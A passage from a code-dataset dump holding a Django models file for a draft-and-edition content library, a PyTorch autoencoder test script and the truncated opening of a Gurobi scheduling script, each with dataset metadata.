if imported.requested_path is None:\n imported.requested_path = \"/\"\n imported.save()\n path_prefix = os.path.join('/Drafts', draft.name)\n rel_path = imported.requested_path\n rel_full_path = os.path.join(rel_path, imported.name)\n install_path_str = ''.join([path_prefix, rel_path]).rstrip('/')\n install_path = CItemPath.objects.find_by_path(install_path_str, draft)\n if not install_path:\n install_path = CItemPath.objects.create_from_path(\n user, install_path_str, draft)\n imported_name = imported.contentfile.path\n just_path,tail = os.path.split(imported_name)\n\n # We can have multiple items by the same name in the same draft, if\n # they've uploaded multiple versions of it.\n #\n # XXX: I believe the kwarg, \"citempath\" in the line below, should\n # actually be \"installed_path\". 
Anyone care to confirm?\n # - Forrest\n existing = CItem.objects.filter(name=imported.name, citempath=install_path)\n # If we have existing items, they all share the same installed_path\n # so we can safely take the last one\n if existing:\n existing_item = existing.latest('version')\n\n if not update:\n raise Exception('Must specify update=True to replace item %s' % \\\n existing_item.to_path())\n\n existing_path = install_path\n new_path = None\n path = existing_path\n\n else:\n existing_path = None\n new_path = install_path\n path = new_path\n\n # find all versions of the item identified by the relative path,\n # which is the library logical full id for the item, and change\n # the version number so that we have a version history for the\n # item which is cross draft.\n res = self.filter(rel_pathname_string=rel_full_path).aggregate(Max('version'))\n version = res['version__max']\n if version is None:\n version = 1\n else:\n version += 1\n\n item = self.create(name=imported.name,\n description=imported.description,\n mime_type=imported.mime_type,\n detected_meta_data=imported.detected_meta_data,\n dimensions = imported.dimensions,\n rel_pathname_string=rel_full_path,\n installed_path=path,\n contentfile=DjangoFile(open(imported_name), tail),\n edit=imported.edit,\n imported=imported,\n version=version)\n imported.installed_item=item\n imported.save()\n try:\n draft_items = DraftItems.objects.get(draft=draft)\n except DraftItems.DoesNotExist:\n draft_items = DraftItems.objects.create(draft=draft)\n if existing_path:\n # If the item will live at an existing path location, then\n # we need to remove the old item and replace it with the\n # new in both the existing path and the draft item lists\n existing_path.citems.remove(existing_item)\n draft_items.citems.remove(existing_item)\n existing_path.citems.add(item)\n else:\n # If the path/item combination is new for this draft, then\n # we just add the item to path\n new_path.citems.add(item)\n draft_items.citems.add(item)\n\n return item\n\n def find_by_path(self, path, draft=None):\n last = None\n path_data = path_drafter(path, draft)\n draft = path_data['draft']\n # skip the leading /\n tpath = path_data['full_path'][1:]\n just_path, tail = os.path.split(tpath)\n pitem = CItemPath.objects.find_by_path(just_path, draft)\n if pitem is None:\n return None\n for citem in pitem.citems.all():\n if citem.name == tail:\n return citem\n return None\n\ndef path_drafter(path, draft=None):\n \"\"\"\n Returns:\n ``dict`` with the following keys:\n :attr:`full_path`: A string representing a path, starting with\n \"/Drafts/[Draft Name]/\"\n\n :attr:`rel_path`: A relative version of the full path above, minus\n the leading slash, draft and draft name portions. 
Example:\n \"foo/bar\".\n\n :attr:`draft`: The ``mcms.baseclib.models.Draft`` instance\n represented by the `full_path` key of this `dict`.\n \"\"\"\n tpath = path\n tmp = tpath.split('/')\n if tpath.startswith('/Draft'):\n tpath = tpath[1:]\n if draft:\n if tmp[2] != draft.name:\n raise Exception('invalid path %s for draft %s' % (path, draft.name))\n else:\n draft_name = tmp[2]\n try:\n draft = Draft.objects.get(name=draft_name)\n except Draft.DoesNotExist:\n raise Exception('invalid path %s: draft %s does not exist' % (path, draft_name))\n else:\n if draft is None:\n raise Exception('invalid path %s, must be full path with /Drafts or called with draft' % path)\n if tpath.startswith('/'):\n tpath = tpath[1:]\n tpath = \"Drafts/\" + draft.name + \"/\" + tpath\n rel_path = \"/\".join(tpath.split(\"/\")[2:])\n full_path = \"/\" + tpath\n res = dict(full_path=full_path,\n rel_path=rel_path,\n draft=draft)\n return res\n\nclass CItem(models.Model):\n contentfile = models.FileField(upload_to=\"libuploads/%Y/%m/%d\")\n name = models.CharField(max_length=50)\n description = models.CharField(max_length=1024, null=True)\n mime_type = models.CharField(max_length=50)\n detected_meta_data = models.CharField(max_length=1024)\n dimensions = models.CharField(max_length=50, null=True, blank=True)\n installed_path = models.ForeignKey(\"CItemPath\")\n # for easy cross draft search for same logical item, includes item name\n rel_pathname_string = models.CharField(max_length=4096, db_index=True)\n version = models.IntegerField(default=1)\n # this is the edit at which it was created, may be part of multiple drafts\n # see draft item for that\n edit = models.ForeignKey(Edit)\n imported = models.ForeignKey(\"ImportItem\", null=True, blank=True)\n objects = CItemManager()\n\n def can_delete(self):\n pass\n\n def __unicode__(self):\n msg = str(self.id)\n if self.description:\n msg += \" \" + self.description\n return msg\n\n def get_all_paths(self, draft):\n res = []\n for path in self.citempath_set.filter(draft=draft):\n if path == self.installed_path:\n primary = True\n else:\n primary = False\n full_path_name = path.to_path() + \"/\" + self.name\n if full_path_name.startswith(\"/Editions\"):\n continue\n draft_path_name = path.draft_path() + \"/\" + self.name\n spec = dict(full_path_name=full_path_name,\n draft_path_name=draft_path_name,\n primary=primary,\n path_item=path)\n res.append(spec)\n return res\n\n def full_path(self):\n return self.installed_path.to_path() + \"/\" + self.name\n\n def draft_path_only(self):\n # skip level one \"Drafts\" and two \"draft.name\"\n tmp = (self.installed_path.to_path() + \"/\" + self.name).split(\"/\")\n return \"/\" + '/'.join(tmp[3:-1])\n\n def draft_path(self):\n # skip level one \"Drafts\" and two \"draft.name\"\n tmp = (self.installed_path.to_path() + \"/\" + self.name).split(\"/\")\n return \"/\" + '/'.join(tmp[3:])\n\n def ajax_json_data(self, draft_path=False):\n try:\n dims = json.loads(self.dimensions)\n except TypeError:\n dims = None\n try:\n meta = json.loads(self.detected_meta_data)\n except TypeError:\n meta = None\n except ValueError:\n meta = None\n exten = None\n try:\n mt = MimeType.objects.get(name=self.mime_type)\n if mt.mimeextension_set.all().count() > 0:\n exten = mt.mimeextension_set.all()[0].extension\n except MimeType.DoesNotExist:\n pass\n if exten is None:\n exten = os.path.splitext(self.contentfile.name)[1]\n if draft_path:\n path = self.draft_path()\n else:\n path = self.full_path()\n res = dict(name=self.name,\n id=self.id,\n 
description=self.description,\n version=self.version,\n path=path,\n dimensions=dims,\n mimetype=self.mime_type,\n detected_meta_data=meta,\n extension=exten,\n url=self.contentfile.url,)\n return res\n\n def ajax_json(self, draft_path=False):\n return json.dumps(self.ajax_json_data(draft_path))\n\n class Meta:\n app_label = 'mcms'\n unique_together = [('name','installed_path','version',),]\n\n\ndef file_hash(path):\n \"\"\"\n Generate an MD5 hash of the file passed in.\n \"\"\"\n with open(path, 'rb') as handle:\n hasher = hashlib.md5()\n while True:\n data = handle.read(8192)\n if not data:\n break\n hasher.update(data)\n return hasher.hexdigest()\n\n\nclass ImportItem(models.Model):\n contentfile = models.FileField(upload_to=\"libuploads/pending/%Y/%m/%d\")\n name = models.CharField(max_length=50)\n description = models.CharField(max_length=1024, null=True, blank=True)\n requested_path = models.TextField(null=True, blank=True)\n mime_type = models.CharField(max_length=50, null=True, blank=True)\n detected_meta_data = models.CharField(max_length=1024, null=True, blank=True)\n dimensions = models.CharField(max_length=50, null=True, blank=True)\n installed_item = models.ForeignKey(CItem, null=True, blank=True, db_index=True)\n edit = models.ForeignKey(Edit)\n md5_hash = models.CharField(max_length=128, null=True, blank=True)\n\n def __unicode__(self):\n msg = str(self.id)\n if self.description:\n msg += \" \" + self.description\n return msg\n\n def full_path(self):\n return self.requested_path + \"/\" + self.name\n\n def detect_type(self):\n if self.mime_type is None:\n text = magic.from_file(self.contentfile.path)\n mime = magic.from_file(self.contentfile.path, magic.MAGIC_MIME)\n if mime.startswith(\"image\"):\n im = Image.open(self.contentfile.path)\n image_meta = im.info\n meta = dict()\n meta['size'] = im.size\n meta['format'] = im.format\n meta['mode'] = im.mode\n meta = json.dumps(meta)\n dim = {'width': im.size[0],\n 'height': im.size[1]}\n else:\n dim = None\n meta = text\n self.mime_type = mime\n self.detected_meta_data = meta\n self.dimensions = json.dumps(dim)\n self.save()\n\n if self.dimensions:\n dim = json.loads(self.dimensions)\n else:\n dim = None\n\n if not self.md5_hash:\n self.md5_hash = file_hash(self.contentfile.path)\n\n return dict(mime_type=self.mime_type,\n description=self.detected_meta_data,\n dimensions=dim)\n\n def detect_type_display(self):\n data = self.detect_type()\n res = data['mime_type']\n if data['mime_type'].startswith('image'):\n dim = data['dimensions']\n res += \" %dx%d\" % (dim['width'], dim['height'])\n else:\n res += \" \" + self.detected_meta_data\n return res\n\n class Meta:\n app_label = 'mcms'\n\n\nclass CItemPathManager(TreeManager):\n \"\"\"\n Provides custom model manager methods for working with :class:`CItemPath`\n instances.\n\n When working with :class:`CItemPath` instances, it is important to note\n that string representations of the trees of ``CItemPath`` instances that form\n full paths in the Content Library's logical filesystem may be either\n \"absolute\" or \"relative\" according to the following definitions:\n\n Absolute Path:\n The string representation of a ``CItemPath`` that includes the path\n from the root of the Content Library's logical filesystem to the\n ``Draft`` instance with which the path is associated.\n\n Relative Path:\n The string representation of a ``CItemPath`` that does **not** include\n the path from the root of the Content Library's logical filesystem to\n the ``Draft`` instance with which the path 
is associated.\n\n The string representation for Relative Paths still begins with a forward\n slash, which is why they are sometimes referred to in the code as\n \"relative full paths\".\n\n Given a ``Draft`` named \"foo\" and subpaths named \"bar\" and \"baz\",\n therefore, here are the string representations of both the absolute and\n relative paths to \"baz\":\n\n Absolute Path: \"/Drafts/foo/bar/baz\"\n Relative Path: \"/bar/baz\"\n \"\"\"\n def create_from_path(self, user, path, draft, edit=None):\n \"\"\"\n Creates the :class:`CItemPath` instance and all necessary parent\n :class:`CItemPath` instances specified by the \"absolute\" or \"relative\"\n :attr:`path` string and the associated :attr:`draft`, and returns the\n leaf :class:`CItemPath` instance.\n\n If the specified path already exists, it will simply be returned.\n \"\"\"\n last = None\n path_data = path_drafter(path, draft)\n # Skip leading and trailing forward slashes\n tpath = path_data['rel_path'].strip('/')\n draft_path = draft.get_citem_path()\n last = draft_path\n if tpath:\n for part in tpath.split(\"/\"):\n try:\n current = self.get(name=part, parent=last)\n except CItemPath.DoesNotExist:\n if edit is None:\n edit = Edit.objects.create(\n user=user, source='manual', draft=draft)\n current = self.create(name=part, parent=last, draft=draft)\n CItemPathChange.objects.create(\n old=None, new=current, edit=edit)\n last = current\n return last\n\n def find_by_path(self, path, draft=None):\n \"\"\"\n Returns the :class:`CItemPath` instance specified by the requested\n \"absolute\" or \"relative\" :attr:`path` string.\n\n If a \"relative\" :attr:`path` is given, its associated :class:`Draft`\n instance must also be specified.\n \"\"\"\n last = None\n path_data = path_drafter(path, draft)\n draft = path_data['draft']\n # Skip leading and trailing forward slashes\n tpath = path_data['full_path'].strip('/')\n for part in tpath.split('/'):\n try:\n if last is None:\n current = self.get(name=part, parent__isnull=True)\n else:\n current = self.get(name=part, parent=last)\n except CItemPath.DoesNotExist:\n return None\n last = current\n return last\n\n\nclass CItemPath(MPTTModel):\n name = models.CharField(max_length=50)\n parent = TreeForeignKey('self', null=True, blank=True, related_name='children')\n citems = models.ManyToManyField(CItem, blank=True, null=True)\n draft = models.ForeignKey(Draft)\n objects = CItemPathManager()\n\n def __unicode__(self):\n return self.name\n\n def save(self, *args,**kwargs):\n if self.parent is None:\n if self.name != \"Editions\" and self.name != \"Drafts\":\n raise ValueError('if path is a root, it must be either Editions or Drafts')\n super(CItemPath, self).save(*args,**kwargs)\n\n def to_path(self):\n path = list()\n path.append(\"\")\n for x in self.get_ancestors():\n path.append(x.name)\n path.append(self.name)\n return \"/\".join(path)\n\n def draft_path(self):\n # skip level one \"Drafts\" and two \"draft.name\"\n tmp = self.to_path().split(\"/\")\n return \"/\" + '/'.join(tmp[3:])\n\n def ajax_json_data(self, draft_path=False):\n if draft_path:\n path = self.draft_path()\n else:\n path = self.to_path()\n\n res = dict(name=self.name,\n item_count=self.citems.count(),\n id=self.id,\n path=path,\n )\n return res\n\n def ajax_json(self, draft_path=False):\n return json.dumps(self.ajax_json_data(draft_path=draft_path))\n\n class MPTTMeta:\n order_insertion_by = ['name']\n\n class Meta:\n app_label = 'mcms'\n unique_together = [('name', 'parent',),]\n\n\nclass CItemPathChange(models.Model):\n old 
= models.ForeignKey(CItemPath, related_name=\"source\", null=True, blank=True)\n new = models.ForeignKey(CItemPath, related_name=\"dest\", null=True, blank=True)\n edit = models.ForeignKey(Edit)\n\n class Meta:\n app_label = 'mcms'\n\n\nclass Edition(models.Model):\n name = models.CharField(max_length=1024, unique=True)\n create_time = models.DateTimeField(default=timezone.now)\n previous_edition = models.ForeignKey('Edition', related_name='previous', null=True, blank=True)\n source_draft = models.ForeignKey(Draft)\n\n def __unicode__(self):\n return self.name\n\n def get_item_count(self):\n # there can be only one\n q = self.editionitems_set.all()\n if q.count() == 0:\n return 0\n return q[0].citems.all().count()\n\n def get_citem_path(self):\n return self.source_draft.get_citem_path()\n \n def clone_to_draft(self, name):\n return self.source_draft.clone(name)\n\n class Meta:\n app_label = 'mcms'\n\n\nclass EditionItems(models.Model):\n edition = models.ForeignKey(Edition, unique=True)\n citems = models.ManyToManyField(CItem, null=True, blank=True)\n\n class Meta:\n app_label = 'mcms'\n", "sub_path": "mcms/baseclib/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 28869, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "django.db.models.Manager", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 36, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 36, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 37, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 37, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 38, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 38, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 39, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 40, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 40, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 42, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 42, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 43, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 43, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 52, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 52, "usage_type": "name"}, {"api_name": "django.db.transaction.commit_on_success", "line_number": 124, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 124, "usage_type": "name"}, {"api_name": 
"django.db.transaction.commit_on_success", "line_number": 165, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 165, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 204, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 204, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 205, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 205, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 206, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 206, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 215, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 215, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 216, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User", "line_number": 216, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 216, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 217, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 217, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 217, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 217, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 218, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 218, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 219, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 219, "usage_type": "name"}, {"api_name": "django.db.models.BooleanField", "line_number": 220, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 220, "usage_type": "name"}, {"api_name": "django.db.models.Manager", "line_number": 229, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 229, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path", "line_number": 267, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 269, "usage_type": "call"}, {"api_name": "os.path", "line_number": 269, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 276, "usage_type": "call"}, {"api_name": "os.path", "line_number": 276, "usage_type": "attribute"}, {"api_name": "django.db.models.Max", "line_number": 307, "usage_type": "call"}, {"api_name": "django.core.files.File", "line_number": 321, "usage_type": "call"}, {"api_name": "django.db.transaction.commit_on_success", "line_number": 231, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 231, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "django.db.models.Model", "line_number": 401, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 401, "usage_type": "name"}, {"api_name": "django.db.models.FileField", "line_number": 402, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 402, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 403, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 403, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 404, 
"usage_type": "call"}, {"api_name": "django.db.models", "line_number": 404, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 405, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 405, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 406, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 406, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 407, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 407, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 408, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 408, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 410, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 410, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 411, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 411, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 414, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 414, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 415, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 415, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 459, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 463, "usage_type": "call"}, {"api_name": "mimemap.models.MimeType.objects.get", "line_number": 470, "usage_type": "call"}, {"api_name": "mimemap.models.MimeType.objects", "line_number": 470, "usage_type": "attribute"}, {"api_name": "mimemap.models.MimeType", "line_number": 470, "usage_type": "name"}, {"api_name": "mimemap.models.MimeType.DoesNotExist", "line_number": 473, "usage_type": "attribute"}, {"api_name": "mimemap.models.MimeType", "line_number": 473, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 476, "usage_type": "call"}, {"api_name": "os.path", "line_number": 476, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 494, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 506, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 515, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 515, "usage_type": "name"}, {"api_name": "django.db.models.FileField", "line_number": 516, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 516, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 517, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 517, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 518, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 518, "usage_type": "name"}, {"api_name": "django.db.models.TextField", "line_number": 519, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 519, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 520, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 520, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 521, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 521, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 522, "usage_type": "call"}, {"api_name": "django.db.models", 
"line_number": 522, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 523, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 523, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 524, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 524, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 525, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 525, "usage_type": "name"}, {"api_name": "magic.from_file", "line_number": 538, "usage_type": "call"}, {"api_name": "magic.from_file", "line_number": 539, "usage_type": "call"}, {"api_name": "magic.MAGIC_MIME", "line_number": 539, "usage_type": "attribute"}, {"api_name": "Image.open", "line_number": 541, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 547, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 555, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 559, "usage_type": "call"}, {"api_name": "mptt.models.TreeManager", "line_number": 584, "usage_type": "name"}, {"api_name": "mptt.models.MPTTModel", "line_number": 669, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 670, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 670, "usage_type": "name"}, {"api_name": "mptt.models.TreeForeignKey", "line_number": 671, "usage_type": "call"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 672, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 672, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 673, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 673, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 712, "usage_type": "call"}, {"api_name": "django.db.models.Model", "line_number": 722, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 722, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 723, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 723, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 724, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 724, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 725, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 725, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 731, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 731, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 732, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 732, "usage_type": "name"}, {"api_name": "django.db.models.DateTimeField", "line_number": 733, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 733, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 733, "usage_type": "attribute"}, {"api_name": "django.utils.timezone", "line_number": 733, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 734, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 734, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 735, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 735, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 757, 
"usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 757, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 758, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 758, "usage_type": "name"}, {"api_name": "django.db.models.ManyToManyField", "line_number": 759, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 759, "usage_type": "name"}]} +{"seq_id": "337107966", "text": "import argparse\nimport json\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\n\nimport logger\nfrom image_folder import ImageFolder720p\nfrom models.cae_32x32x32_zero_pad_bin import CAE\nfrom utils import save_imgs\n\n\ndef test(cfg):\n\tos.makedirs(f\"./test/{cfg['exp_name']}\", exist_ok=True)\n\n\tmodel = CAE().cuda()\n\n\tmodel.load_state_dict(torch.load(cfg['chkpt']))\n\tmodel.eval()\n\tlogger.info(\"Loaded model from\", cfg['chkpt'])\n\n\tdataset = ImageFolder720p(cfg['dataset_path'])\n\tdataloader = DataLoader(dataset, batch_size=1, shuffle=cfg['shuffle'])\n\tlogger.info(f\"Done setup dataloader: {len(dataloader)}\")\n\n\tmse_loss = nn.MSELoss()\n\n\tfor bi, (img, patches, path) in enumerate(dataloader):\n\n\t\tout = torch.zeros(6, 10, 3, 128, 128)\n\t\t# enc = torch.zeros(6, 10, 16, 8, 8)\n\t\tavg_loss = 0\n\n\t\tfor i in range(6):\n\t\t\tfor j in range(10):\n\t\t\t\tx = Variable(patches[:, :, i, j, :, :]).cuda()\n\t\t\t\ty = model(x)\n\n\t\t\t\t# e = model.enc_x.data\n\t\t\t\t# p = torch.tensor(np.random.permutation(e.reshape(-1, 1)).reshape(1, 16, 8, 8)).cuda()\n\t\t\t\t# out[i, j] = model.decode(p).data\n\n\t\t\t\t# enc[i, j] = model.enc_x.data\n\t\t\t\tout[i, j] = y.data\n\n\t\t\t\tloss = mse_loss(y, x)\n\t\t\t\tavg_loss += (1 / 60) * loss.item()\n\n\t\tlogger.debug('[%5d/%5d] avg_loss: %f' % (bi, len(dataloader), avg_loss))\n\n\t\t# save output\n\t\tout = np.transpose(out, (0, 3, 1, 4, 2))\n\t\tout = np.reshape(out, (768, 1280, 3))\n\t\tout = np.transpose(out, (2, 0, 1))\n\n\t\ty = torch.cat((img[0], out), dim=2)\n\t\tsave_imgs(imgs=y.unsqueeze(0), to_size=(3, 768, 2 * 1280), name=f\"./test/{cfg['exp_name']}/test_{bi}.png\")\n\n\n# save encoded\n# enc = np.reshape(enc, -1)\n# sz = str(len(enc)) + 'd'\n# open(f\"./{cfg['exp_name']}/test_{bi}.enc\", \"wb\").write(struct.pack(sz, *enc))\n\ndef main(args):\n\tcfg = json.load(open(args.cfg, \"rt\"))\n\ttest(cfg)\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('--cfg', type=str, required=True)\n\tmain(parser.parse_args())\n", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 1992, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.makedirs", "line_number": 18, "usage_type": "call"}, {"api_name": "models.cae_32x32x32_zero_pad_bin.CAE", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 22, "usage_type": "call"}, {"api_name": "logger.info", "line_number": 24, "usage_type": "call"}, {"api_name": "image_folder.ImageFolder720p", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 27, "usage_type": "call"}, {"api_name": "logger.info", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.zeros", 
"line_number": 34, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 40, "usage_type": "call"}, {"api_name": "logger.debug", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.transpose", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 60, "usage_type": "call"}, {"api_name": "utils.save_imgs", "line_number": 61, "usage_type": "call"}, {"api_name": "json.load", "line_number": 70, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "259742840", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 8 14:19:54 2019\r\n\r\n@author: AA-VManohar\r\n\"\"\"\r\n\r\n\r\ntry:\r\n import logging\r\n import logging.handlers\r\n import csv\r\n import pandas as pd\r\n import pyodbc\r\n import datetime as dtm\r\n from gurobipy import *\r\n import time\r\n import smtplib\r\n from email.mime.multipart import MIMEMultipart\r\n from email.mime.text import MIMEText\r\n from email.mime.base import MIMEBase\r\n from email import encoders\r\n start_time = time.time()\r\n #inputs\r\n out_1 = {}\r\n out_2 = {}\r\n out_3 = {}\r\n out_copy = {}\r\n missed_ref =[]\r\n infeas_shift ={}\r\n infeasible_day = {}\r\n infeas_ref = []\r\n date_fl = {}\r\n #a = 1.10\r\n objec = {}\r\n M1 = 0\r\n M2 = 0\r\n sch_sh_check = {}\r\n TODAY = dtm.datetime.today()\r\n exp_units = {}\r\n exp_sku = {}\r\n slot_count = {}\r\n logger = logging.getLogger('DFW_run')\r\n logger.setLevel(logging.DEBUG)\r\n rh = 